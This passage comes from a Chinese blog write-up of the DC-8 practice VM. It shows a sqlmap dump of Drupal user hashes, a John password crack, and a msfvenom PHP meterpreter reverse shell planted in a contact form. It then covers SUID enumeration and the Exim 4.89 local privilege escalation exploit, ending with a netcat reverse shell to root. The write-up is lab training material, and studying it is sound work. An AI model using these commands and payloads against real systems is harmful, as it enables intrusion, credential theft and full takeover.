class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ sqlmap -u <span class="string">"http://192.168.116.135/?nid=1"</span> --batch -D d7db -T users -C <span class="built_in">name</span>,mail,pass --dump </span><br><span class="line">        <span class="variable">___</span></span><br><span class="line">       <span class="variable">__H__</span></span><br><span class="line"> <span class="variable">___</span> <span class="variable">___</span>[.]<span class="variable">_____</span> <span class="variable">___</span> <span class="variable">___</span>  &#123;<span class="number">1.3</span>.<span class="number">8</span><span class="meta">#stable&#125;</span></span><br><span class="line">|_ -| . [(]     | .<span class="string">'| . |</span></span><br><span class="line"><span class="string">|___|_  [.]_|_|_|__,|  _|</span></span><br><span class="line"><span class="string">      |_|V...       |_|   http://sqlmap.org</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'</span>s responsibility <span class="keyword">to</span> obey all applicable <span class="built_in">local</span>, state <span class="built_in">and</span> federal laws. Developers assume no liability <span class="built_in">and</span> are <span class="built_in">not</span> responsible <span class="keyword">for</span> any misuse <span class="built_in">or</span> <span class="built_in">damage</span> caused by this program</span><br><span class="line"></span><br><span class="line">[*] starting @ <span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span> /<span class="number">2019</span>-<span class="number">09</span>-<span class="number">22</span>/</span><br><span class="line"></span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] resuming back-end DBMS <span class="string">'mysql'</span> </span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] testing connection <span class="keyword">to</span> the target URL</span><br><span class="line">sqlmap resumed the following injection point(s) <span class="keyword">from</span> stored session:</span><br><span class="line">---</span><br><span class="line">Parameter: nid (GET)</span><br><span class="line">    <span class="built_in">Type</span>: boolean-based blind</span><br><span class="line">    Title: <span class="built_in">AND</span> boolean-based blind - WHERE <span class="built_in">or</span> HAVING clause</span><br><span class="line">    Payload: nid=<span class="number">1</span> <span class="built_in">AND</span> <span class="number">7434</span>=<span class="number">7434</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">Type</span>: error-based</span><br><span class="line">    Title: MySQL &gt;= <span class="number">5.0</span> <span class="built_in">AND</span> error-based - WHERE, HAVING, ORDER BY <span class="built_in">or</span> <span class="built_in">GROUP</span> BY clause (<span class="built_in">FLOOR</span>)</span><br><span class="line">    Payload: nid=<span class="number">1</span> <span class="built_in">AND</span> (<span class="built_in">SELECT</span> <span class="number">5822</span> <span class="keyword">FROM</span>(<span class="built_in">SELECT</span> <span class="built_in">COUNT</span>(*),CONCAT(<span class="number">0</span>x716b767871,(<span class="built_in">SELECT</span> (ELT(<span class="number">5822</span>=<span class="number">5822</span>,<span class="number">1</span>))),<span class="number">0</span>x7178717671,<span class="built_in">FLOOR</span>(RAND(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">FROM</span> INFORMATION_SCHEMA.PLUGINS <span class="built_in">GROUP</span> BY x)a)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">Type</span>: <span class="built_in">time</span>-based blind</span><br><span class="line">    Title: MySQL &gt;= <span class="number">5.0</span>.<span class="number">12</span> <span class="built_in">AND</span> <span class="built_in">time</span>-based blind (query <span class="built_in">SLEEP</span>)</span><br><span class="line">    Payload: nid=<span class="number">1</span> <span class="built_in">AND</span> (<span class="built_in">SELECT</span> <span class="number">6066</span> <span class="keyword">FROM</span> (<span class="built_in">SELECT</span>(<span class="built_in">SLEEP</span>(<span class="number">5</span>)))jOuH)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">Type</span>: UNION query</span><br><span class="line">    Title: Generic UNION query (NULL) - <span class="number">1</span> column</span><br><span class="line">    Payload: nid=-<span class="number">9086</span> UNION ALL <span class="built_in">SELECT</span> CONCAT(<span class="number">0</span>x716b767871,<span class="number">0</span>x635349446c7871725473696250696f6e57684163546277736a706a416479444c736e424d6669744e,<span class="number">0</span>x7178717671)-- KIcF</span><br><span class="line">---</span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] the back-end DBMS is MySQL</span><br><span class="line">web application technology: Apache</span><br><span class="line">back-end DBMS: MySQL &gt;= <span class="number">5.0</span></span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] fetching entries of column(s) <span class="string">'mail, name, pass'</span> <span class="keyword">for</span> table <span class="string">'users'</span> <span class="built_in">in</span> database <span class="string">'d7db'</span></span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] used SQL query returns <span class="number">3</span> entries</span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] retrieved: <span class="string">''</span>,<span class="string">''</span>,<span class="string">''</span></span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] retrieved: <span class="string">'dcau-user@outlook.com'</span>,<span class="string">'admin'</span>,<span class="string">'$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'</span></span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] retrieved: <span class="string">'john@blahsdfsfd.org'</span>,<span class="string">'john'</span>,<span class="string">'$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'</span></span><br><span class="line">Database: d7db                                                                                                                                                                                                                                </span><br><span class="line">Table: users</span><br><span class="line">[<span class="number">2</span> entries]</span><br><span class="line">+-------+-----------------------+---------------------------------------------------------+</span><br><span class="line">| <span class="built_in">name</span>  | mail                  | pass                                                    |</span><br><span class="line">+-------+-----------------------+---------------------------------------------------------+</span><br><span class="line">| <span class="built_in">admin</span> | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |</span><br><span class="line">| john  | john@blahsdfsfd.org   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/<span class="number">3</span><span class="keyword">if</span>/oRVZJaz5mKC2vF |</span><br><span class="line">+-------+-----------------------+---------------------------------------------------------+</span><br><span class="line"></span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] table <span class="string">'d7db.users'</span> dumped <span class="keyword">to</span> CSV file <span class="string">'/home/kali-team/.sqlmap/output/192.168.116.135/dump/d7db/users.csv'</span></span><br><span class="line">[<span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span>] [INFO] fetched data logged <span class="keyword">to</span> <span class="built_in">text</span> files under <span class="string">'/home/kali-team/.sqlmap/output/192.168.116.135'</span></span><br><span class="line"></span><br><span class="line">[*] ending @ <span class="number">08</span>:<span class="number">52</span>:<span class="number">00</span> /<span class="number">2019</span>-<span class="number">09</span>-<span class="number">22</span>/</span><br><span class="line"></span><br><span class="line">➜  ~</span><br></pre></td></tr></table></figure>
<h2 id="破解密码"><a href="#破解密码" class="headerlink" title="破解密码"></a>破解密码</h2><ul>
<li>不知道Hash是什么算法的可以用HashID测试一下，<code>https://hashcat.net/wiki/doku.php?id=example_hashes</code>，也可以在这搜索一下特征。当然是Drupal自写的算法。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ cat hash.txt                                     </span><br><span class="line"><span class="variable">$S</span><span class="variable">$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z</span></span><br><span class="line"><span class="variable">$S</span><span class="variable">$DqupvJbxVmqjr6cYePnx2A891ln7lsuku</span>/3if/oRVZJaz5mKC2vF</span><br><span class="line"></span><br><span class="line">➜  ~ hashid hash.txt</span><br><span class="line">--File <span class="string">'hash.txt'</span>--</span><br><span class="line">Analyzing <span class="string">'$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'</span></span><br><span class="line">[+] Drupal &gt; v7.x </span><br><span class="line">Analyzing <span class="string">'$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'</span></span><br><span class="line">[+] Drupal &gt; v7.x </span><br><span class="line">--End of file <span class="string">'hash.txt'</span>--%                                                                                            ➜  ~</span><br></pre></td></tr></table></figure>
<ul>
<li>用John破解发现有一个密码破解成功了，john:turtle</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ john hash.txt --show                                                                        </span><br><span class="line">john@blahsdfsfd.org:turtle</span><br><span class="line"></span><br><span class="line">1 password <span class="built_in">hash</span> cracked, 1 left</span><br><span class="line">➜  ~</span><br></pre></td></tr></table></figure>
<h2 id="上传木马"><a href="#上传木马" class="headerlink" title="上传木马"></a>上传木马</h2><ul>
<li>刚刚在robots.txt找到的登录页面，<code>http://192.168.116.135/?q=user/login/</code>，进到后台修改配置项Contact Us的Form settings，把<strong>Text format</strong> 的选项改为PHP Code。</li>
<li>生成php的后门。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.116.1 LPORT=7788 -o shell.php</span><br><span class="line">[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload</span><br><span class="line">[-] No arch selected, selecting arch: php from the payload</span><br><span class="line">No encoder or badchars specified, outputting raw payload</span><br><span class="line">Payload size: 30656 bytes</span><br><span class="line">Saved as: shell.php</span><br><span class="line">➜  ~</span><br></pre></td></tr></table></figure>
<ul>
<li>把php后门复制到<strong>Confirmation message</strong>里，开启MSF监听端口，保存后到联系页面提交评论。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">msf5 exploit(multi/handler) &gt; show options </span><br><span class="line"></span><br><span class="line">Module options (exploit/multi/handler):</span><br><span class="line"></span><br><span class="line">   Name  Current Setting  Required  Description</span><br><span class="line">   ----  ---------------  --------  -----------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (php/meterpreter_reverse_tcp):</span><br><span class="line"></span><br><span class="line">   Name   Current Setting  Required  Description</span><br><span class="line">   ----   ---------------  --------  -----------</span><br><span class="line">   LHOST  192.168.116.1    yes       The listen address (an interface may be specified)</span><br><span class="line">   LPORT  7788             yes       The listen port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line">   Id  Name</span><br><span class="line">   --  ----</span><br><span class="line">   0   Wildcard Target</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msf5 exploit(multi/handler) &gt; run </span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.116.1:7788 </span><br><span class="line">[*] Meterpreter session 3 opened (192.168.116.1:7788 -&gt; 192.168.116.135:45166) at 2019-09-22 09:12:05 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt;</span><br></pre></td></tr></table></figure>
<h2 id="提升权限"><a href="#提升权限" class="headerlink" title="提升权限"></a>提升权限</h2><ul>
<li>查找有SUID的文件，套路和前面的都一样。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; shell</span><br><span class="line">Process 1087 created.</span><br><span class="line">Channel 0 created.</span><br><span class="line">bash</span><br><span class="line">python -c <span class="string">'import pty;pty.spawn("/bin/bash")'</span></span><br><span class="line">www-data@dc-8:/var/www/html$ find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br><span class="line">/usr/bin/chfn</span><br><span class="line">/usr/bin/gpasswd</span><br><span class="line">/usr/bin/chsh</span><br><span class="line">/usr/bin/passwd</span><br><span class="line">/usr/bin/sudo</span><br><span class="line">/usr/bin/newgrp</span><br><span class="line">/usr/sbin/exim4</span><br><span class="line">/usr/lib/openssh/ssh-keysign</span><br><span class="line">/usr/lib/eject/dmcrypt-get-device</span><br><span class="line">/usr/lib/dbus-1.0/dbus-daemon-launch-helper</span><br><span class="line">/bin/ping</span><br><span class="line">/bin/su</span><br><span class="line">/bin/umount</span><br><span class="line">/bin/mount</span><br><span class="line">www-data@dc-8:/var/www/html$</span><br></pre></td></tr></table></figure>
<ul>
<li>发现了一个<code>/usr/sbin/exim4</code>，在正常情况很少这种情况，所以出题人故意的。查看版本是：4.89</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">www-data@dc-8:/var/www/html$ exim4 --version</span><br><span class="line">exim4 --version</span><br><span class="line">Exim version 4.89 <span class="comment">#2 built 14-Jun-2017 05:03:07</span></span><br><span class="line">Copyright (c) University of Cambridge, 1995 - 2017</span><br><span class="line">(c) The Exim Maintainers and contributors <span class="keyword">in</span> ACKNOWLEDGMENTS file, 2007 - 2017</span><br><span class="line">Berkeley DB: Berkeley DB 5.3.28: (September  9, 2013)</span><br><span class="line">Support <span class="keyword">for</span>: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open</span><br><span class="line">Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd</span><br><span class="line">Authenticators: cram_md5 plaintext</span><br><span class="line">Routers: accept dnslookup ipliteral manualroute queryprogram redirect</span><br><span class="line">Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp</span><br><span class="line">Fixed never_users: 0</span><br><span class="line">Configure owner: 0:0</span><br><span class="line">Size of off_t: 8</span><br><span class="line">Configuration file is /var/lib/exim4/config.autogenerated</span><br></pre></td></tr></table></figure>
<ul>
<li>提权exp：<code>https://www.exploit-db.com/exploits/46996</code></li>
</ul>
<figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ searchsploit exim <span class="number">4.8</span> </span><br><span class="line">------------------------------------------------------------------------------ ----------------------------------------</span><br><span class="line"> Exploit Title                                                                |  <span class="type">Path</span></span><br><span class="line">                                                                              | <span class="type">(/usr</span>/share/exploitdb/)</span><br><span class="line">------------------------------------------------------------------------------ ----------------------------------------</span><br><span class="line">Exim <span class="number">4.84</span><span class="number">-3</span> - <span class="keyword">Local</span> Privilege Escalation                                      | <span class="type">exploits</span>/linux/local/<span class="number">39535.</span>sh</span><br><span class="line">Exim <span class="number">4.87</span> - <span class="number">4.91</span> - <span class="keyword">Local</span> Privilege Escalation                                 | <span class="type">exploits</span>/linux/local/<span class="number">46996.</span>sh</span><br><span class="line">Exim <span class="number">4.87</span> / <span class="number">4.91</span> - <span class="keyword">Local</span> Privilege Escalation (Metasploit)                    | <span class="type">exploits</span>/linux/local/<span class="number">47307.</span>rb</span><br><span class="line">Exim <span class="number">4.87</span> &lt; <span class="number">4.91</span> - (<span class="keyword">Local</span> / Remote) Command Execution                         | <span class="type">exploits</span>/linux/remote/<span class="number">46974.</span>txt</span><br><span class="line">Exim <span class="number">4.89</span> - 'BDAT' Denial of Service                                          | <span class="type">exploits</span>/multiple/dos/<span class="number">43184.</span>txt</span><br><span class="line">Exim &lt; <span class="number">4.86</span><span class="number">.2</span> - <span class="keyword">Local</span> Privilege Escalation                                    | <span class="type">exploits</span>/linux/local/<span class="number">39549.</span>txt</span><br><span class="line">Exim ESMTP <span class="number">4.80</span> - glibc gethostbyname Denial of Service                       | <span class="type">exploits</span>/linux/dos/<span class="number">35951.</span>py</span><br><span class="line">------------------------------------------------------------------------------ ----------------------------------------</span><br><span class="line">Shellcodes: No Result</span><br><span class="line">➜  ~</span><br></pre></td></tr></table></figure>
<ul>
<li>本地权限提升的有两个到4.91版本以下，一个是MSF的，还有一个是sh脚本的。MSF那个试了，不知道为什么利用不了。<a href="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md" target="_blank" rel="noopener">文档</a></li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">msf5 exploit(linux/<span class="built_in">local</span>/exim4_deliver_message_priv_esc) &gt; show options </span><br><span class="line"></span><br><span class="line">Module options (exploit/linux/<span class="built_in">local</span>/exim4_deliver_message_priv_esc):</span><br><span class="line"></span><br><span class="line">   Name      Current Setting  Required  Description</span><br><span class="line">   ----      ---------------  --------  -----------</span><br><span class="line">   EXIMPORT  25               yes       The port exim is listening to</span><br><span class="line">   SESSION   3                yes       The session to run this module on.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (linux/x86/meterpreter/reverse_tcp):</span><br><span class="line"></span><br><span class="line">   Name   Current Setting  Required  Description</span><br><span class="line">   ----   ---------------  --------  -----------</span><br><span class="line">   LHOST  192.168.116.1    yes       The listen address (an interface may be specified)</span><br><span class="line">   LPORT  13371            yes       The listen port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line">   Id  Name</span><br><span class="line">   --  ----</span><br><span class="line">   0   Exim 4.87 - 4.91</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msf5 exploit(linux/<span class="built_in">local</span>/exim4_deliver_message_priv_esc) &gt; run </span><br><span class="line"></span><br><span class="line">[!] SESSION may not be compatible with this module.</span><br><span class="line">[*] Started reverse TCP handler on 192.168.116.1:13371 </span><br><span class="line">[*] Payload sent, <span class="built_in">wait</span> a few seconds...</span><br><span class="line">[-] Exploit aborted due to failure: unknown: Couldn<span class="string">'t escalate privileges</span></span><br><span class="line"><span class="string">[*] Exploit completed, but no session was created.</span></span><br><span class="line"><span class="string">msf5 exploit(linux/local/exim4_deliver_message_priv_esc) &gt;</span></span><br></pre></td></tr></table></figure>
<ul>
<li>知道为什么可以教我一下哦，接下来还是用sh版的吧。这里有一个坑，直接上传searchsploit会出现</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory</span><br><span class="line">www-data@dc-8:/tmp$ ./46996.sh</span><br><span class="line">./46996.sh</span><br><span class="line">bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory</span><br><span class="line">www-data@dc-8:/tmp$ sed -i -e <span class="string">'s/\r$//'</span> 46996.sh</span><br></pre></td></tr></table></figure>
<ul>
<li>上网查了是文件的格式不对，把结束符替换就可以了。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$ ./46996.sh -m netcat</span><br><span class="line">./46996.sh -m netcat</span><br><span class="line"></span><br><span class="line">raptor_exim_wiz - <span class="string">"The Return of the WIZard"</span> LPE exploit</span><br><span class="line">Copyright (c) 2019 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;</span><br><span class="line"></span><br><span class="line">Delivering netcat payload...</span><br><span class="line">220 dc-8 ESMTP Exim 4.89 Sun, 22 Sep 2019 21:03:24 +1000</span><br><span class="line">250 dc-8 Hello localhost [::1]</span><br><span class="line">250 OK</span><br><span class="line">250 Accepted</span><br><span class="line">354 Enter message, ending with <span class="string">"."</span> on a line by itself</span><br><span class="line">250 OK id=1iBzeG-0000Ui-8O</span><br><span class="line">221 dc-8 closing connection</span><br><span class="line"></span><br><span class="line">Waiting 5 seconds...</span><br><span class="line">localhost [127.0.0.1] 31337 (?) open</span><br><span class="line">netcat -e /bin/bash 192.168.116.1 2333</span><br><span class="line">netcat -e /bin/bash 192.168.116.1 2333</span><br></pre></td></tr></table></figure>
<ul>
<li>在本机用netcat监听端口2333，当虚拟机执行提权监本后出现open后输入<code>netcat -e /bin/bash 192.168.116.1 2333</code>，就能拿到Root权限了。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ netcat -nlvp 2333 </span><br><span class="line">Connection from 192.168.116.135:33958</span><br><span class="line">id</span><br><span class="line">uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)</span><br></pre></td></tr></table></figure>
<h2 id="获取Flag"><a href="#获取Flag" class="headerlink" title="获取Flag"></a>获取Flag</h2><p>忘记了</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://www.yuque.com/kali-team">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#DC-8-Write-up"><span class="toc-number">1.</span> <span class="toc-text">DC: 8-Write-up</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#信息收集"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用"><span class="toc-number">1.2.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#破解密码"><span class="toc-number">1.3.</span> <span class="toc-text">破解密码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#上传木马"><span class="toc-number">1.4.</span> <span class="toc-text">上传木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#提升权限"><span class="toc-number">1.5.</span> <span class="toc-text">提升权限</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#获取Flag"><span class="toc-number">1.6.</span> <span class="toc-text">获取Flag</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&text=DC: 8-Write-up"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&is_video=false&description=DC: 8-Write-up"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DC: 8-Write-up&body=Check out this article: https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&name=DC: 8-Write-up&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 Kali-Team
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://www.yuque.com/kali-team">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
